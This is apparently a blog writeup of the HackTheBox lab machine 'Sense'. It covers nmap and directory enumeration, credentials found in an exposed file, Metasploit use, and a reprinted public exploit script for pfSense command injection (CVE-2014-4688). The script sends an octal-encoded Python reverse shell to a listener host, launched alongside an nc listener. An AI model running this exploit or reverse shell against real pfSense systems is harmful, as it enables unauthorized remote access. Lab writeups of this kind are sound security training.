xsspresso
xsspresso
WriteupsHTB — Sense
WebMediumLinux

HTB — Sense

pfSense 2.1.3 authenticated command injection (CVE-2014-4688). Credentials found via directory fuzzing on the web interface.

March 29, 2022HackTheBox
#pfSense#Command Injection#CVE-2014-4688#Fuzzing

Enumeration

sh
nmap -sC -sV -vv 10.10.10.60 -oN sense
sh
PORT    STATE SERVICE  REASON         VERSION
80/tcp  open  http     syn-ack ttl 63 lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http syn-ack ttl 63 lighttpd 1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US/emailAddress=Email Address/organizationalUnitName=Organizational Unit Name (eg, section)/localityName=Somecity
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US/emailAddress=Email Address/organizationalUnitName=Organizational Unit Name (eg, section)/localityName=Somecity
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after:  2023-04-06T19:21:35
| MD5:   65f8 b00f 57d2 3468 2c52 0f44 8110 c622
| SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
| -----BEGIN CERTIFICATE-----
| MIIEKDCCA5GgAwIBAgIJALChaIpiwz41MA0GCSqGSIb3DQEBCwUAMIG/MQswCQYD
| VQQGEwJVUzESMBAGA1UECBMJU29tZXdoZXJlMREwDwYDVQQHEwhTb21lY2l0eTEU
| MBIGA1UEChMLQ29tcGFueU5hbWUxLzAtBgNVBAsTJk9yZ2FuaXphdGlvbmFsIFVu
| aXQgTmFtZSAoZWcsIHNlY3Rpb24pMSQwIgYDVQQDExtDb21tb24gTmFtZSAoZWcs
| IFlPVVIgbmFtZSkxHDAaBgkqhkiG9w0BCQEWDUVtYWlsIEFkZHJlc3MwHhcNMTcx
| MDE0MTkyMTM1WhcNMjMwNDA2MTkyMTM1WjCBvzELMAkGA1UEBhMCVVMxEjAQBgNV
| BAgTCVNvbWV3aGVyZTERMA8GA1UEBxMIU29tZWNpdHkxFDASBgNVBAoTC0NvbXBh
| bnlOYW1lMS8wLQYDVQQLEyZPcmdhbml6YXRpb25hbCBVbml0IE5hbWUgKGVnLCBz
| ZWN0aW9uKTEkMCIGA1UEAxMbQ29tbW9uIE5hbWUgKGVnLCBZT1VSIG5hbWUpMRww
| GgYJKoZIhvcNAQkBFg1FbWFpbCBBZGRyZXNzMIGfMA0GCSqGSIb3DQEBAQUAA4GN
| ADCBiQKBgQC/sWU6By08lGbvttAfx47SWksgA7FavNrEoW9IRp0W/RF9Fp5BQesL
| L3FMJ0MHyGcfRhnL5VwDCL0E+1Y05az8PY8kUmjvxSvxQCLn6Mh3nTZkiAJ8vpB0
| WAnjltrTCEsv7Dnz2OofkpqaUnoNGfO3uKWPvRXl9OlSe/BcDStffQIDAQABo4IB
| KDCCASQwHQYDVR0OBBYEFDK5DS/hTsi9SHxT749Od/p3Lq05MIH0BgNVHSMEgeww
| gemAFDK5DS/hTsi9SHxT749Od/p3Lq05oYHFpIHCMIG/MQswCQYDVQQGEwJVUzES
| MBAGA1UECBMJU29tZXdoZXJlMREwDwYDVQQHEwhTb21lY2l0eTEUMBIGA1UEChML
| Q29tcGFueU5hbWUxLzAtBgNVBAsTJk9yZ2FuaXphdGlvbmFsIFVuaXQgTmFtZSAo
| ZWcsIHNlY3Rpb24pMSQwIgYDVQQDExtDb21tb24gTmFtZSAoZWcsIFlPVVIgbmFt
| ZSkxHDAaBgkqhkiG9w0BCQEWDUVtYWlsIEFkZHJlc3OCCQCwoWiKYsM+NTAMBgNV
| HRMEBTADAQH/MA0GCSqGSIb3DQEBCwUAA4GBAHNn+1AX2qwJ9zhgN3I4ES1Vq84l
| n6p7OoBefxcf31Pn3VDnbvJJFFcZdplDxbIWh5lyjpTHRJQyHECtEMW677rFXJAl
| /cEYWHDndn9Gwaxn7JyffK5lUAPMPEDtudQb3cxrevP/iFZwefi2d5p3jFkDCcGI
| +Y0tZRIRzHWgQHa/
|_-----END CERTIFICATE-----
|_http-title: Login
|_http-favicon: Unknown favicon MD5: 082559A7867CF27ACAB7E9867A8B320F
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_ssl-date: TLS randomness does not represent time
|_http-server-header: lighttpd/1.4.35

Directory Enum

sh
/	200	7204
index.php	200	453
help.php	200	453
stats.php	200	453
themes	???	???
pfsense_ng	???	???
javascript	???	???
niftyjsCode.js	200	5002
csrf	???	???
csrf-magic.js	200	7511
javascript	???	???
jquery.js	200	245502
edit.php	200	453
license.php	200	453
system.php	200	453
status.php	200	453
changelog.txt	200	583
exec.php	200	453
graph.php	200	453
tree	200	8007
tree.js	200	5451
wizard.php	200	472
pkg.php	200	453
installer	302	243
index.php	302	224
installer.php	200	453
xmlrpc.php	200	614
reboot.php	200	453
interfaces.php	200	453
system-users.txt	200	394

  • Potential username: Rohit

  • Potential password: pfsense_ng , pfsense
  • Correct login info: rohit : pfsense

Exploitation and Privelege Escalation

Metasploit

sh
msfconsole
 
search pfsense

  • I have tried exploit → exploit/unix/http/pfsense_group_member_exec but didn’t work. One reason was because the latest configuration was on 2017
  • exploit/unix/http/pfsense_group_member_exec worked

sh
cd /home/rohit
cat user.txt
	-> ZmxhZ3tOb3RfSW5fSGVyZX0=
 
cd root
cat root.txt
	-> ZmxhZ3tOb3RfSW5fSGVyZX0=

Without Metasploit

  • https://www.exploit-db.com/exploits/43560
sh
searchsploit 43560
 
searchsploit
python
#!/usr/bin/env python3
 
# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688
 
import argparse
import requests
import urllib
import urllib3
import collections
 
'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''
 
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()
 
rhost = args.rhost
lhost = args.lhost
lport = args.lport
username = args.username
password = args.password
 
 
# command to be converted into octal
command = """
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("%s",%s));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
""" % (lhost, lport)
 
 
payload = ""
 
# encode payload in octal
for char in command:
	payload += ("\\" + oct(ord(char)).lstrip("0o"))
 
login_url = 'https://' + rhost + '/index.php'
exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
 
headers = [
	('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
	('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
	('Accept-Language', 'en-US,en;q=0.5'),
	('Referer',login_url),
	('Connection', 'close'),
	('Upgrade-Insecure-Requests', '1'),
	('Content-Type', 'application/x-www-form-urlencoded')
]
 
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
 
# Disable insecure https connection warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
client = requests.session()
 
# try to get the login page and grab the csrf token
try:
	login_page = client.get(login_url, verify=False)
 
	index = login_page.text.find("csrfMagicToken")
	csrf_token = login_page.text[index:index+128].split('"')[-1]
 
except:
	print("Could not connect to host!")
	exit()
 
# format login variables and data
if csrf_token:
	print("CSRF token obtained")
	login_data = [('__csrf_magic',csrf_token), ('usernamefld',username), ('passwordfld',password), ('login','Login') ]
	login_data = collections.OrderedDict(login_data)
	encoded_data = urllib.parse.urlencode(login_data)
 
# POST login request with data, cookies and header
	login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers)
else:
	print("No CSRF token!")
	exit()
 
if login_request.status_code == 200:
		print("Running exploit...")
# make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell
		try:
			exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5)
			if exploit_request.status_code:
				print("Error running exploit")
		except:
			print("Exploit completed")

sh
nc -lvnp 1234
sh
python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.4 --lport 1234 --username rohit --password pfsense

Skills Learned

  • Modifying publicly available exploits
  • Bypassing strict filtering
  • Exploiting PFSense

Up next

MediumApr 2022

HTB — Solidstate

Apache James 2.3.2 arbitrary file read leaks user creds. Root via world-writable cron script executed by root.

Read writeup
MediumApr 2022

HTB — Node

Node.js API endpoint exposes hashed admin credentials. MongoDB backup decryption and SUID binary analysis for root.

Read writeup
MediumApr 2022

HTB — Valentine

Heartbleed (CVE-2014-0160) memory leak extracts a base64-encoded RSA key passphrase. Root via tmux session hijack.

Read writeup